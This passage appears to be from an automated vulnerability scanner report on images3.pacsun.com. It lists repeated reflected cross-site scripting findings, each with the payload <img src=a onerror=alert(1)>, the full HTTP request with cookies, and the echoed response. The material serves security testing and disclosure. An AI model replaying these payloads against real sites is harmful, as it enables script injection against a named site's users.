Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:27 GMT
Connection: close

Unable to find /pacsun/detailLogo_551ff769<img src=a onerror=alert(1)>4cee47844e1

3.70. http://images3.pacsun.com/is/image/pacsun/detailLogo_581 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_581

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9574c<img%20src%3da%20onerror%3dalert(1)>fefecf03ff0 was submitted in the REST URL parameter 4. This input was echoed as 9574c<img src=a onerror=alert(1)>fefecf03ff0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_5819574c<img%20src%3da%20onerror%3dalert(1)>fefecf03ff0?$img_gif$&hei=20&wid=55&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:31 GMT
Connection: close

Unable to find /pacsun/detailLogo_5819574c<img src=a onerror=alert(1)>fefecf03ff0

3.71. http://images3.pacsun.com/is/image/pacsun/detailLogo_651 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_651

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7b7b8<img%20src%3da%20onerror%3dalert(1)>c0ef5bf553c was submitted in the REST URL parameter 4. This input was echoed as 7b7b8<img src=a onerror=alert(1)>c0ef5bf553c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_6517b7b8<img%20src%3da%20onerror%3dalert(1)>c0ef5bf553c?$img_gif$&hei=20&wid=83&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:47 GMT
Connection: close

Unable to find /pacsun/detailLogo_6517b7b8<img src=a onerror=alert(1)>c0ef5bf553c

3.72. http://images3.pacsun.com/is/image/pacsun/detailLogo_711 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_711

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cf073<img%20src%3da%20onerror%3dalert(1)>349e06f6aa1 was submitted in the REST URL parameter 4. This input was echoed as cf073<img src=a onerror=alert(1)>349e06f6aa1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_711cf073<img%20src%3da%20onerror%3dalert(1)>349e06f6aa1?$img_gif$&hei=20&wid=47&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:35 GMT
Connection: close

Unable to find /pacsun/detailLogo_711cf073<img src=a onerror=alert(1)>349e06f6aa1

3.73. http://images3.pacsun.com/is/image/pacsun/detailLogo_821 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_821

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d3224<img%20src%3da%20onerror%3dalert(1)>cbeb6a32bd3 was submitted in the REST URL parameter 4. This input was echoed as d3224<img src=a onerror=alert(1)>cbeb6a32bd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_821d3224<img%20src%3da%20onerror%3dalert(1)>cbeb6a32bd3?$img_gif$&hei=20&wid=62&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:36 GMT
Connection: close

Unable to find /pacsun/detailLogo_821d3224<img src=a onerror=alert(1)>cbeb6a32bd3

3.74. http://images3.pacsun.com/is/image/pacsun/detailLogo_841 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_841

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 57e45<img%20src%3da%20onerror%3dalert(1)>886d240528f was submitted in the REST URL parameter 4. This input was echoed as 57e45<img src=a onerror=alert(1)>886d240528f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_84157e45<img%20src%3da%20onerror%3dalert(1)>886d240528f?$img_gif$&hei=20&wid=88&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:34 GMT
Connection: close

Unable to find /pacsun/detailLogo_84157e45<img src=a onerror=alert(1)>886d240528f

3.75. http://images3.pacsun.com/is/image/pacsun/detailLogo_851 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_851

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 49714<img%20src%3da%20onerror%3dalert(1)>47a258f6aab was submitted in the REST URL parameter 4. This input was echoed as 49714<img src=a onerror=alert(1)>47a258f6aab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_85149714<img%20src%3da%20onerror%3dalert(1)>47a258f6aab?$img_gif$&hei=20&wid=83&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:28 GMT
Connection: close

Unable to find /pacsun/detailLogo_85149714<img src=a onerror=alert(1)>47a258f6aab

3.76. http://images3.pacsun.com/is/image/pacsun/detailLogo_882 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_882

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 25fa5<img%20src%3da%20onerror%3dalert(1)>0605ce3fb60 was submitted in the REST URL parameter 4. This input was echoed as 25fa5<img src=a onerror=alert(1)>0605ce3fb60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_88225fa5<img%20src%3da%20onerror%3dalert(1)>0605ce3fb60?$img_gif$&hei=20&wid=40&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:37 GMT
Connection: close

Unable to find /pacsun/detailLogo_88225fa5<img src=a onerror=alert(1)>0605ce3fb60

3.77. http://images3.pacsun.com/is/image/pacsun/detailLogo_891 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_891

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f122e<img%20src%3da%20onerror%3dalert(1)>8fe677fa087 was submitted in the REST URL parameter 4. This input was echoed as f122e<img src=a onerror=alert(1)>8fe677fa087 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_891f122e<img%20src%3da%20onerror%3dalert(1)>8fe677fa087?$img_gif$&hei=20&wid=17&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:36 GMT
Connection: close

Unable to find /pacsun/detailLogo_891f122e<img src=a onerror=alert(1)>8fe677fa087

3.78. http://images3.pacsun.com/is/image/pacsun/detailLogo_911 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_911

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8cd2c<img%20src%3da%20onerror%3dalert(1)>1f8bc0e79cf was submitted in the REST URL parameter 4. This input was echoed as 8cd2c<img src=a onerror=alert(1)>1f8bc0e79cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_9118cd2c<img%20src%3da%20onerror%3dalert(1)>1f8bc0e79cf?$img_gif$&hei=20&wid=46&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:33 GMT
Connection: close

Unable to find /pacsun/detailLogo_9118cd2c<img src=a onerror=alert(1)>1f8bc0e79cf

3.79. http://images3.pacsun.com/is/image/pacsun/detailLogo_921 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_921

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 34b5d<img%20src%3da%20onerror%3dalert(1)>d93ebbf56 was submitted in the REST URL parameter 4. This input was echoed as 34b5d<img src=a onerror=alert(1)>d93ebbf56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_92134b5d<img%20src%3da%20onerror%3dalert(1)>d93ebbf56?$img_gif$&hei=20&wid=83&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 79
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:40 GMT
Connection: close

Unable to find /pacsun/detailLogo_92134b5d<img src=a onerror=alert(1)>d93ebbf56

3.80. http://images3.pacsun.com/is/image/pacsun/detailLogo_A05 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_A05

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 560bb<img%20src%3da%20onerror%3dalert(1)>62ff753761b was submitted in the REST URL parameter 4. This input was echoed as 560bb<img src=a onerror=alert(1)>62ff753761b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_A05560bb<img%20src%3da%20onerror%3dalert(1)>62ff753761b?$img_gif$&hei=20&wid=20&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:28 GMT
Connection: close

Unable to find /pacsun/detailLogo_A05560bb<img src=a onerror=alert(1)>62ff753761b

3.81. http://images3.pacsun.com/is/image/pacsun/detailLogo_B07 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_B07

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 44f39<img%20src%3da%20onerror%3dalert(1)>bcadb3209b2 was submitted in the REST URL parameter 4. This input was echoed as 44f39<img src=a onerror=alert(1)>bcadb3209b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_B0744f39<img%20src%3da%20onerror%3dalert(1)>bcadb3209b2?$img_gif$&hei=20&wid=22&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:37 GMT
Connection: close

Unable to find /pacsun/detailLogo_B0744f39<img src=a onerror=alert(1)>bcadb3209b2

3.82. http://images3.pacsun.com/is/image/pacsun/detailLogo_C07 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_C07

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 71f65<img%20src%3da%20onerror%3dalert(1)>c40a9d0d17e was submitted in the REST URL parameter 4. This input was echoed as 71f65<img src=a onerror=alert(1)>c40a9d0d17e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_C0771f65<img%20src%3da%20onerror%3dalert(1)>c40a9d0d17e?$img_gif$&hei=20&wid=19&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:34 GMT
Connection: close

Unable to find /pacsun/detailLogo_C0771f65<img src=a onerror=alert(1)>c40a9d0d17e

3.83. http://images3.pacsun.com/is/image/pacsun/detailLogo_E01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_E01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 94385<img%20src%3da%20onerror%3dalert(1)>e4589bd16b0 was submitted in the REST URL parameter 4. This input was echoed as 94385<img src=a onerror=alert(1)>e4589bd16b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_E0194385<img%20src%3da%20onerror%3dalert(1)>e4589bd16b0?$img_gif$&hei=20&wid=56&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:45 GMT
Connection: close

Unable to find /pacsun/detailLogo_E0194385<img src=a onerror=alert(1)>e4589bd16b0

3.84. http://images3.pacsun.com/is/image/pacsun/detailLogo_E02 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_E02

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 56cd3<img%20src%3da%20onerror%3dalert(1)>61afdd70dae was submitted in the REST URL parameter 4. This input was echoed as 56cd3<img src=a onerror=alert(1)>61afdd70dae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_E0256cd3<img%20src%3da%20onerror%3dalert(1)>61afdd70dae?$img_gif$&hei=20&wid=65&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:38 GMT
Connection: close

Unable to find /pacsun/detailLogo_E0256cd3<img src=a onerror=alert(1)>61afdd70dae

3.85. http://images3.pacsun.com/is/image/pacsun/detailLogo_ElectricBar2 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_ElectricBar2

Issue detail

